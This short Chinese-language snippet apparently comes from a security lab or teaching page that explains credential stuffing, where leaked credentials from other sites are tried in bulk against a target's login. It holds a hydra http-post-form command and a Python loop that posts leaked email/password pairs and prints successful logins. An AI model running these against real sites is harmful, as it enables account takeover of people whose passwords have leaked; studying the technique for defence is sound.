攻击者使用从其他网站泄露的凭证,批量尝试登录目标网站
使用泄露凭证库批量尝试(共 7 条凭证)
暂无
# 使用 hydra 进行撞库
hydra -L emails.txt -P passwords.txt target.com http-post-form \
"/login:email=^USER^&password=^PASS^:Invalid"
# 使用 Python 脚本
import requests
for email, password in leaked_credentials:
r = requests.post(url, data={'email': email, 'password': password})
if 'success' in r.text:
print(f'[+] Found: {email}:{password}')